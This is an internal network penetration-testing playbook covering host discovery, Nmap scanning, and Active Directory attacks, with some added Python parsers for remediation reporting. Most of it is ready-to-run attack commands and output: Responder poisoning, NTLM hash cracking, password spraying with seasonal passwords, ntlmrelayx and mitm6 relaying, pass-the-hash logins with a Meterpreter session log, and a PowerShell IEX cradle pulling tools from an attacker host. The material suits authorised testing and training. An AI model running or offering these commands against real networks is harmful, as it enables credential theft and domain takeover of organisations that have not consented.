Basic Internal Network test
Slightly less than the minimum standard
  • Start responder
  • Start nessus
  • Check outbound internet access

Host Discovery

If you are not given a target list, ping-scan the private ranges with Nmap and start Responder:

```bash
sudo responder -I eth0

nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp

# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp

# Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp

# Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp

# netdiscover
netdiscover -i eth0 -P

# NBTScan
nbtscan 192.168.1.0/24
```
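The `grep answer | awk '{print $11}'` pipeline above only recovers the victim IPs. The following is an added example (not part of the original page) that parses the same Responder-Session.log into a per-host summary a defender can hand back as a remediation list: which hosts accepted a poisoned reply, over which protocol, and which names (for example `wpad`) they were trying to resolve. The line layout is assumed from Responder's default log format (`<date> <time> <AM/PM> - [*] [PROTO] Poisoned answer sent to <ip> for name <name>`), which is also the layout the `awk` field index relies on; the sample lines are constructed.

```python
"""Summarise Responder's session log for remediation: which hosts accepted a
poisoned LLMNR/NBT-NS/mDNS answer and which names they were trying to resolve.

Added example, not from the original page. The line layout is an assumption
based on Responder's default log format, the same layout the page's
awk '{print $11}' depends on. Every host listed here still has multicast name
resolution enabled and is a hardening item (disable LLMNR/NBT-NS via GPO).
"""
import re
from collections import defaultdict

POISON_RE = re.compile(
    r"\[(?P<proto>LLMNR|NBT-NS|MDNS)\]\s+Poisoned answer sent to "
    r"(?P<ip>[0-9a-fA-F.:]+) for name (?P<name>\S+)"
)

# Constructed sample lines in the assumed Responder-Session.log layout.
SAMPLE_LOG = """\
05/12/2023 09:58:10 AM - [*] Responder started (constructed banner line)
05/12/2023 10:01:22 AM - [*] [LLMNR]  Poisoned answer sent to 10.0.0.5 for name FILESRV
05/12/2023 10:01:22 AM - [*] [NBT-NS] Poisoned answer sent to 10.0.0.5 for name FILESRV (service: File Server)
05/12/2023 10:02:03 AM - [*] [MDNS] Poisoned answer sent to 10.0.0.7 for name printer.local
05/12/2023 10:02:40 AM - [*] [LLMNR]  Poisoned answer sent to 10.0.0.12 for name wpad
05/12/2023 10:03:01 AM - [*] [LLMNR]  Poisoned answer sent to 10.0.0.5 for name wpad
05/12/2023 10:03:05 AM - [SMB] NTLMv2-SSP Client   : 10.0.0.5 (constructed, not a poison line)
""".splitlines()


def _ip_key(ip):
    """Sort IPv4 addresses numerically; anything else sorts after them as a string."""
    parts = ip.split(".")
    if len(parts) == 4 and all(p.isdigit() for p in parts):
        return (0, tuple(int(p) for p in parts))
    return (1, ip)


def parse_responder_log(lines):
    """Return {ip: {"protocols": set, "names": set, "count": int}} for poisoned hosts."""
    hosts = defaultdict(lambda: {"protocols": set(), "names": set(), "count": 0})
    for line in lines:
        m = POISON_RE.search(line)
        if not m:
            continue  # banner, hash-capture and other lines are not poison events
        rec = hosts[m["ip"]]
        rec["protocols"].add(m["proto"])
        rec["names"].add(m["name"].lower())
        rec["count"] += 1
    return dict(hosts)


def poisoned_hosts(lines):
    """Sorted unique victim IPs: the same content as the page's grep/awk pipeline."""
    return sorted(parse_responder_log(lines), key=_ip_key)


def hosts_resolving(lines, name):
    """Hosts that looked up a given name (e.g. 'wpad') over a poisonable protocol."""
    hosts = parse_responder_log(lines)
    return sorted((ip for ip, rec in hosts.items() if name.lower() in rec["names"]), key=_ip_key)


def report(lines):
    """One tab-separated line per host, ready to include in the remediation list."""
    hosts = parse_responder_log(lines)
    return [
        f"{ip}\t{rec['count']} poisoned\t{'/'.join(sorted(rec['protocols']))}"
        f"\tnames: {', '.join(sorted(rec['names']))}"
        for ip, rec in sorted(hosts.items(), key=lambda kv: _ip_key(kv[0]))
    ]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```

Run it against the real log with `report(open("/usr/share/responder/logs/Responder-Session.log").readlines())`; hosts returned by `hosts_resolving(..., "wpad")` are the ones whose proxy auto-discovery is leaving the DNS namespace and deserve attention first.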
Now cat, grep and sort the discovered IP addresses into a file called Targets.txt.

If you are given a range, do the following:

```bash
nmap -sn 192.168.10.0/24 -n | grep report | cut -d ' ' -f 5 | tee -a ipaddresses.txt | tee -a targets.txt
nmap -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5- | tee -a host-ip.txt
```

Nmap Scans

```bash
mkdir Scans
nmap -p 21 -n --open -iL targets.txt -oN Scans/ftp
nmap -p 22 -n --open -iL targets.txt -oN Scans/ssh
nmap -p 23 -n --open -iL targets.txt -oN Scans/telnet
nmap -p 80 -n --open -iL targets.txt -oN Scans/http
nmap -p 443 -n --open -iL targets.txt -oN Scans/https
nmap -p 445 -n --open -iL targets.txt -oN Scans/smb
nmap -p 3389 -n --open -iL targets.txt -oN Scans/rdp

cat Scans/ftp | grep for | cut -d " " -f 5 > ftphosts.txt
cat Scans/ssh | grep for | cut -d " " -f 5 > sshhosts.txt
cat Scans/telnet | grep for | cut -d " " -f 5 > telnethosts.txt
cat Scans/http | grep for | cut -d " " -f 5 > httphosts.txt
cat Scans/https | grep for | cut -d " " -f 5 > httpshosts.txt
cat Scans/smb | grep for | cut -d " " -f 5 > smbhosts.txt
cat Scans/rdp | grep for | cut -d " " -f 5 > rdphosts.txt
```
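The `grep for | cut -d " " -f 5` pipelines take every "Nmap scan report for" line on trust. Two cases they do not handle: the `for hostname (ip)` form that appears when reverse DNS is on (the page avoids it with `-n`), and a host whose header is printed even though its only scanned port is filtered, which then lands in a `*hosts.txt` file although the port is not open. The following added example (not from the original page) parses the `-oN` output properly and only keeps a host when the port is actually in state `open`; the sample scan text is constructed in the `-oN` layout.

```python
"""Parse nmap normal output (-oN) into per-host port lists, replacing the
page's `grep for | cut -d " " -f 5` pipelines with a parser that checks
the port state.

Added example, not from the original page. The sample scan text is
constructed by hand in the -oN layout.
"""
import re

REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<host>\S+) \()?(?P<ip>[0-9a-fA-F.:]+)\)?\s*$"
)
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)

# Constructed sample of what `nmap -p 445 --open -iL targets.txt -oN Scans/smb`
# might write; a hostname form is included to show the parser handles it.
SAMPLE_SCAN = """\
# Nmap 7.93 scan initiated Fri May 12 10:10:00 2023 as: nmap -p 445 --open -iL targets.txt -oN Scans/smb
Nmap scan report for 10.0.0.5
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for fileserver.corp.example (10.0.0.9)
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 10.0.0.20
Host is up (0.0010s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds

# Nmap done at Fri May 12 10:10:05 2023 -- 256 IP addresses (3 hosts up) scanned in 5.12 seconds
"""


def _ip_key(ip):
    """Sort IPv4 addresses numerically; anything else sorts after them as a string."""
    parts = ip.split(".")
    if len(parts) == 4 and all(p.isdigit() for p in parts):
        return (0, tuple(int(p) for p in parts))
    return (1, ip)


def parse_nmap_normal(text):
    """Return {ip: {"hostname": str | None, "ports": [(port, proto, state, service)]}}."""
    results, current = {}, None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = m["ip"]
            results[current] = {"hostname": m["host"], "ports": []}
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            results[current]["ports"].append(
                (int(m["port"]), m["proto"], m["state"], m["service"])
            )
    return results


def hosts_with_open_port(text, port, proto="tcp"):
    """IPs that report the given port in state 'open', sorted numerically."""
    hits = [
        ip for ip, rec in parse_nmap_normal(text).items()
        if any(p == port and pr == proto and st == "open" for p, pr, st, _ in rec["ports"])
    ]
    return sorted(hits, key=_ip_key)


def host_lists(scans, port_map):
    """scans: {name: -oN text}; port_map: {name: port}. Returns {name: [ips]},
    the content of the page's ftphosts.txt / smbhosts.txt / ... files."""
    return {name: hosts_with_open_port(text, port_map[name]) for name, text in scans.items()}


if __name__ == "__main__":
    # Same seven files as the page, read back from Scans/ (hypothetical paths from the page).
    import os
    ports = {"ftp": 21, "ssh": 22, "telnet": 23, "http": 80, "https": 443, "smb": 445, "rdp": 3389}
    scans = {n: open(os.path.join("Scans", n)).read() for n in ports if os.path.exists(os.path.join("Scans", n))}
    for name, ips in host_lists(scans, ports).items():
        with open(f"{name}hosts.txt", "w") as fh:
            fh.write("\n".join(ips) + "\n")
```

Note that 10.0.0.20 in the sample is parsed (its header is present) but is not returned for port 445, which is the difference from the `cut` pipeline.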

Scanning

Start Nessus on the discovered IP addresses.
Run networkscan.sh against all of targets.txt using rush.
Modify it if it is running slowly (thousands of hosts) and reduce the number of ports it looks at.
Find the OS version with CrackMapExec (cme):

```bash
crackmapexec smb smbhosts.txt | tee -a smb-os-versions.txt
```

Make a note of the domain etc. and of any older OS versions.

Network Service Scan

Run this as root, as some of the nmap scans require privileges and sudo can be flaky.

Requirements:

```bash
go get -u github.com/shenwei356/rush/
```

Usage:

```bash
~/go/bin/rush -i targets.txt -c "./networkscan.sh {}"
```
```bash
#!/bin/bash
# networkscan.sh: one target per invocation; rush substitutes {} with a line of targets.txt
mkdir -p networkscan
cd networkscan
# Strip a URL-style prefix if present; a bare IP passes through cut unchanged
target=$(echo "$1" | cut -d "/" -f 3)
userlist=~/jdksec/Payloads/top-usernames-shortlist.txt
passlist=~/jdksec/Payloads/darkweb2017-top100.txt
line="\n=====================\n"
mkdir -p "$target"
cd "$target"
mkdir nmap-basic
mkdir nmap-udp
echo "#####################################################################" | tee -a report-$target.txt
echo "Scan report for $target" | tee -a report-$target.txt
echo "#####################################################################" | tee -a report-$target.txt
echo -e "$line Nmap Scan for $target...$line " | tee -a report-$target.txt
# Full TCP port sweep, then collapse the open ports into a comma-separated list for the service scan
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $target | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo -e "## Open Ports:\n"; for i in $(echo $ports | sed 's/,/\n/g'); do echo $target:$i; done | tee -a ports-$target.txt
echo -e "\n"
# Skip the service scan when no TCP port is open, otherwise nmap would treat $target as the port list
[ -n "$ports" ] && nmap -Pn -sC -sV -p $ports $target -oN nmap-basic/$target
cat nmap-basic/* >> report-$target.txt
echo -e "$line Nmap UDP ...$line " | tee -a report-$target.txt
sudo nmap -sUVC --open $target --top-ports 20 -oN nmap-udp/$target
cat nmap-udp/* >> report-$target.txt
cd nmap-basic/
grep -Hari "/tcp" | grep -v ":|" >> ../services-$target.txt
cd ../
cd nmap-udp/
grep -Hari "/udp" | grep -v filtered >> ../services-$target.txt
cd ../
echo -e "$line Services ...$line " | tee -a report-$target.txt
cat services-$target.txt | tee -a report-$target.txt
echo -e "$line Ports ...$line " | tee -a report-$target.txt
cat ports-$target.txt | tee -a report-$target.txt
mv nmap-basic/$target nmap-tcp-$target.txt
mv nmap-udp/$target nmap-udp-$target.txt
/bin/rm -rf nmap-udp
/bin/rm -rf nmap-basic
```

Gather Webservers

```bash
cat networkscan/*/service* | cut -d '/' -f 1 | tee -a ports.txt | ~/go/bin/httprobe | tee -a webservers.txt
```

Now open each one in Firefox and check for default credentials etc.:

```bash
for i in $(cat webservers.txt); do firefox $i; sleep 1; done
```

Scan with nuclei

```bash
cat webservers.txt | ~/go/bin/nuclei -nts -nc -silent | tee -a vulnscan.txt
```

Basic Vuln scan quick wins

```bash
msfconsole -qx "color false; use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0; run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
msfconsole -qx "color false; use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt; set lhost eth0; run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
```

Check responder for hashes and crack with hashcat

```bash
cat /usr/share/responder/logs/*NTLM* | sort -u >> hashes.txt; cat hashes.txt | sort -u -o hashes.txt
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

# Much slower, so use npk if possible or a cloud cracker
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule
```

Once you have some hashes, test them against several wordlists; if none work, scrape the client's website for words with cewl:

```bash
cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/
```

Then repeat the cracking process with a better password/rule list.

Domain enumeration

Get DC list:

```bash
# Windows command
nltest /DCLIST:domain.local

# Linux commands
cat /etc/resolv.conf

nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt

for i in $(cat Targets.txt); do nslookup $i | grep "dc"; done

# Interactive nslookup: query the DC SRV record
nslookup
> set type=all
> _ldap._tcp.dc._msdcs.DOMAIN
```

Get user list:

```bash
rpcclient -U "domain\\username" 10.0.0.1   # 10.0.0.1 = the DC
rpcclient $> enumdomusers
```

Copy the list of users to a file called "rpcuserlist.txt" and sort it:

```bash
cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt
```

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.
It may be worth checking the password lockout policy with the client if in a sensitive environment.

```text
msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date   # adds a timestamp
run
```

When the time is up, change the password and rerun.
Passwords to try:

```text
Clientname2019
Location2019
Password12345!
Summer2019!
Spring2019!
Summer2018!
Password2018!
Welcome2018!
Password 2018!
```

Find open file servers

SMB Map

Find open SMB shares which are available unauthenticated:

```bash
for i in $(cat targets.txt); do smbmap -H $i; done | tee -a smbmap-output.txt
```

Find open writable shares and search for authenticated file servers:

```bash
for i in $(cat targets.txt); do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
# Ctrl+F "WRITE" to search for writable folders
```

EyeWitness

```bash
python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml
```

NTLM Relay

Modify Responder.conf to turn off HTTP and SMB:

```ini
[Responder Core]

; Servers to start
SQL = On
SMB = Off      ; turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off     ; turn off
HTTPS = On
DNS = On
LDAP = On
```

Start Responder:

```bash
python Responder.py -I <interface> -r -d -w
responder -I <interface> -r -d -w
```

Create a list of targets with SMB signing disabled:

```bash
nmap -n -p 137,139,445 --script=smb-security-mode -iL smbhosts.txt | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
```
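The `grep disabled -B 15 | grep for` pipeline can attach a `disabled` line to the wrong host when a host's script output runs longer than 15 lines, and it silently ignores the "supported" state. The following added example (not from the original page) reads the structured output instead: run the same nmap command with `-oX smb.xml` and audit the `smb-security-mode` results from the XML. It goes one step beyond the page's check, reporting hosts where signing is merely "supported" (enabled but not required) alongside those where it is "disabled", since only "required" actually rejects a relayed session; both lists are the findings a client needs for the SMB-signing hardening item. The XML layout (`<hostscript><script id="smb-security-mode"><elem key="message_signing">`) is assumed from nmap's structured script output, and the sample document is constructed.

```python
"""Audit SMB signing from nmap XML output (-oX) for the smb-security-mode script.

Added example, not from the original page. The XML layout below is assumed
from nmap's structured script output; the sample document is constructed.
message_signing is reported by the script as "required", "supported" or
"disabled"; only "required" blocks NTLM relay.
"""
import xml.etree.ElementTree as ET

# Constructed sample: `nmap -n -p 445 --script=smb-security-mode -iL smbhosts.txt -oX smb.xml`
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -n -p 445 --script=smb-security-mode -iL smbhosts.txt -oX smb.xml">
  <host><status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <hostscript><script id="smb-security-mode" output="(text form omitted)">
      <elem key="account_used">guest</elem>
      <elem key="authentication_level">user</elem>
      <elem key="challenge_response">supported</elem>
      <elem key="message_signing">disabled</elem>
    </script></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.9" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <hostscript><script id="smb-security-mode" output="(text form omitted)">
      <elem key="message_signing">required</elem>
    </script></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.12" addrtype="ipv4"/>
    <hostscript><script id="smb-security-mode" output="(text form omitted)">
      <elem key="message_signing">supported</elem>
    </script></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.30" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def _ip_key(ip):
    """Sort IPv4 addresses numerically; anything else sorts after them as a string."""
    parts = ip.split(".")
    if len(parts) == 4 and all(p.isdigit() for p in parts):
        return (0, tuple(int(p) for p in parts))
    return (1, ip)


def smb_signing_status(xml_text):
    """Return {ip: "required" | "supported" | "disabled" | "unknown"} for every
    host that carries a smb-security-mode result (hosts without SMB are skipped)."""
    root = ET.fromstring(xml_text)
    status = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            addr = host.find("address[@addrtype='ipv6']")
        if addr is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != "smb-security-mode":
                continue
            for elem in script.iter("elem"):
                if elem.get("key") == "message_signing":
                    value = (elem.text or "").strip().lower()
                    # Text-style values such as "disabled (dangerous, but default)" reduce to the first word
                    status[addr.get("addr")] = value.split()[0] if value else "unknown"
    return status


def relay_exposed_hosts(xml_text, include_supported=True):
    """Hosts that would accept a relayed NTLM session: signing disabled, and
    (by default) signing supported but not required."""
    weak = {"disabled", "supported"} if include_supported else {"disabled"}
    return sorted((ip for ip, v in smb_signing_status(xml_text).items() if v in weak), key=_ip_key)


def signing_disabled_hosts(xml_text):
    """Strictly what the page's pipeline writes to smbsigningdisabled.txt."""
    return relay_exposed_hosts(xml_text, include_supported=False)


if __name__ == "__main__":
    for ip, state in sorted(smb_signing_status(SAMPLE_XML).items(), key=lambda kv: _ip_key(kv[0])):
        print(f"{ip}\tmessage_signing: {state}")
```

For the client report, `relay_exposed_hosts()` is the list to remediate (set "Microsoft network server: Digitally sign communications (always)" on the members, not just the DCs); `signing_disabled_hosts()` reproduces the page's narrower list.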
Now start ntlmrelayx.py against the targets:

```bash
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt
```

If you capture a high-privilege user's account, it will dump the hashes from the target system.
Now use psexec within Metasploit to log in to the target:

```text
msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit
```

Sometimes ntlmrelayx fails; to fix this, run the following:

```bash
git clone https://github.com/fortra/impacket.git   # clone the latest impacket
cd impacket
sudo python3.10 -m pip install . --user
python3.10 examples/ntlmrelayx.py -tf ../smbsigningdisabled.txt
```

Pass the hash

Either will do. Once the enumeration has finished, upload the CSV files to your attacker machine.
Then run:

```bash
python ntlmrelayx.py -tf smbsigningdisabled.txt
```

```bash
root@kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
```

```text
root@kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
Server\Administrator
```

```bash
root@kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
root@kali:~# pth-wmis -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
root@kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
root@kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
```

```text
root@kali:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 Administrator@192.168.1.25
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
```

```bash
root@kali:~# apt-get update
root@kali:~# apt-get install freerdp-x11
root@kali:~# xfreerdp /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
```

```text
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200

meterpreter > exit
```

This will output the local hashes if you capture a domain admin's NTLM hash.
Once you have this hash, log in to the machine with Metasploit's psexec pass-the-hash or psexec.py.

Bloodhound

Once on the domain as a Windows user, run the following:

```powershell
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"
```

Once on your attacker machine, make sure you have BloodHound installed and then execute:

```bash
neo4j console
bloodhound
```

Visit 127.0.0.1:7687.
Enter your password and upload the CSV files you extracted from the target.
Click "Queries" and then "Find shortest path to domain admin".

MITM6

```bash
git clone https://github.com/fox-it/mitm6.git
cd mitm6
mitm6 -d domain.local
```

In a new window:

```bash
ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data
```

Wait 30 minutes to an hour for the IPv6 configuration to update.

```bash
cd data
firefox domain_users_by_group.html
```

Review the ntlmrelayx.py output and look for the new user and password that are added when a DA logs in.

Further reading: The worst of both worlds: Combining NTLM Relaying and Kerberos delegation (dirkjanm.io)